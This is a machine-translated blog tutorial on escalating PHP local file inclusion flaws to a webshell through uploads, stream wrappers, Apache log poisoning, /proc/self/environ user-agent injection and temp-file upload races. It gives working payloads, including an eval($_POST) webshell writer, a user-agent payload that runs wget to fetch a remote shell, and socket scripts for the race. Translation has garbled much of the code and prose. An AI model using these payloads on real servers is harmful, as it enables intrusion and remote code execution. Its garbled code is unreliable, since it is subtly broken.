PHP security LFI vulnerability GetShell method parade

Author: LengF Blog: www.81sec.com
0x00 digress
Many friends are not familiar with the LFI (Local File Include, Local File inclusion) vulnerability in PHP. In fact, there is a lot of information on the network, especially for paper outside China. Although a lot of information is not very detailed, but everyone is too lazy to test, this article will give you a summary, and describes the complete use of methods.
0x01 lfi getshell ideas
Before talking about how to use LFI or webshell, we have to remind you that the bug truncated in php5.3.4 has been fixed, so in some cases it is not surprising that it cannot be used successfully.
1. Include uploaded files
As long as the target server supports uploading, whether it is jpg, txt, or gif, a Trojan can be included in it. This method is very simple and there is nothing to say.
2. Include the data: // or php: // input pseudo Protocol
The premise of using this method is that allow_url_include = On in php. ini, And the php: // filter pseudo protocol must be supported.
Let's try this case. Suppose there is a file containing vulnerability Code as follows:
<? Php
$ Query = $ _ GET ['P'];
Include ($ query );
?>

In allow_url_include = On, the remote file is included. If it is off, it can only be included locally. Then, let's talk about how to use PHP Input/Ouput Wrapper to get webshell. I wrote a exploitation program for everyone, 01:

This vulnerability can be exploited. This vulnerability is valid for php5.0 and may fail to be tested in 5.3. It is a good idea.
3. Logs include log files
Log inclusion. This is more practical. Generally, apache or other logs are large. Why can we use the log getwebshell? For example, in apache, when we access a webpage of a website, a page error occurs, and the server records the access connection address. If we bring malicious code, this will be included in the log file. Therefore, we generally take the following steps:
First, access a page that does not exist and carries malicious code. For example, the evil code is:
<? Php fputs (fopen ("/www/shell. php", "W +"), "<? Php eval ($ _ POST [a]?> ";?>
Convert it to url encoding and then access
Http://www.81sec.com/+urlencode (evil code)
This page does not exist, so an error log will be generated. Next, we will include this log:
Http://www.81sec.com/test.php? P =.../var/logs/apache/www_error.log
You need to guess the apache path by yourself. Here I just give an instance and a shell will be generated after the access.
4. Contains/proc/self/environ Environment Variables
This is based on the environment variables in Linux. In many cases, this method does not work because it does not have the/proc/self/environ access permission. like reading/etc/passwd, If you access/proc/self/environ with 02:

When you see this code, you can see why the Linux environment variable is used. Here, the session information of the user accessing the web is displayed, which also contains the user-agent parameter, which is the parameter of your browser name. This parameter can be modified on our client.
We can use the above LFI Code as follows:
Http://www.81sec.com/test.php? P =.../../proc/self/environ
If you have the permission to get a similar description, you can use the following method to get webshell. I will use two methods.
Method 1: Use the firefox plug-in user agent switch
The method is simple and convenient. We first construct our own evil code:
<? System (wget http://81sec.com/shell.txt-O shell. php);?>
Then use this plug-in to modify the user-agent, 03:

Select the Edit User Agents and set it according to your 04:

Then, access/proc/self/environ. You can get the shell. In practice, this method is quite a weakness.
Method 2: Use php to write a socket program. When sending http data, remember to modify the user-agent option for your code. The specific code is similar to the above 2nd methods, it is for everyone to make full use of it.
5. contains session files
This method comes from the k4shifz blog
The default location of the php save format sess_SESSIONID is/tmp/and c:/windows/temp /.
The last one is too troublesome and is enough. Don't take it for granted that tmp is related to move_uploaded_file (). In fact, php will automatically and immediately clear the tmp file when no move_uploaded_file () function is available, the method for keeping it on the server is slow connection. Test the script that contains the temp file. The only advantage of this method is to send a package to any php file. php will generate the tmp file on the server first, and then the slow connection will prevent it from being deleted.
(The premise is that max_file_uploads is added to php. ini file_uploads = On and 5.3.1. the maximum number of uploaded files is 20 by default ):
<?
/* 20 temporary files will be generated if the time used is small */
Set_time_limit (0 );
$ Cmd = Content-Disposition: form-data; name = "edevil"; filename = "edevil. php"
Content-Type: zzz
<? Phpinfo ()?>
-- K4shifz_boundary
;
$ Fs = fsockopen (localhost, 80 );
/* You can also use HTTP/1.1 */
Fputs ($ fs, POST/test. php HTTP/1.0
Content-Type: multipart/form-data; boundary = k4shifz_boundary
Host: localhost
Content-Length: 999999
-- K4shifz_boundary
. $ Cmd );
While ($ fs)
{
Fputs ($ fs, $ cmd );
Sleep (1 );
}
Fclose ($ fs );
Exit;
?>
<?
/* It takes a long time to generate a temporary file */
Set_time_limit (0 );
$ Fs = fsockopen (localhost, 80 );
Fputs ($ fs, POST/test. php HTTP/1.0
Content-Type: multipart/form-data; boundary = k4shifz_boundary
Host: localhost
Content-Length: 999999
-- K4shifz_boundary
Content-Disposition: form-data; name = "edevil"; filename = "edevil. php"
Content-Type: zzz
<? Phpinfo ()?>
-- K4shifz_boundary --
);
While ($ fs)
{
Fputs ($ fs, AAAA );
Sleep (1 );
}
Fclose ($ fs );
Exit;
?>

I have never tested it in practice. I dare not talk nonsense. Let's test it by yourself.
6. Include other files created by the php Program
This method generally depends on your understanding of the program and is suitable for exploiting white-box testing vulnerabilities. When you find an LFI, you must read other files of the program in detail. The variable overwrite vulnerability may exist. You can exploit the variable overwrite vulnerability to execute some php code. For example, the variable of bo-blog overwrites two vulnerabilities.

In the end, Daniel bypasses it. This article is only about literacy. Different situations may occur in the actual application process and you need to adapt to the situation on your own.
[Reference]
[+] Http://gynvael.coldwind.pl/download.php? F=PHP_LFI_rfc1867_temporary_files.pdf
[+] Http://www.bkjia.com/Article/201106/94413.html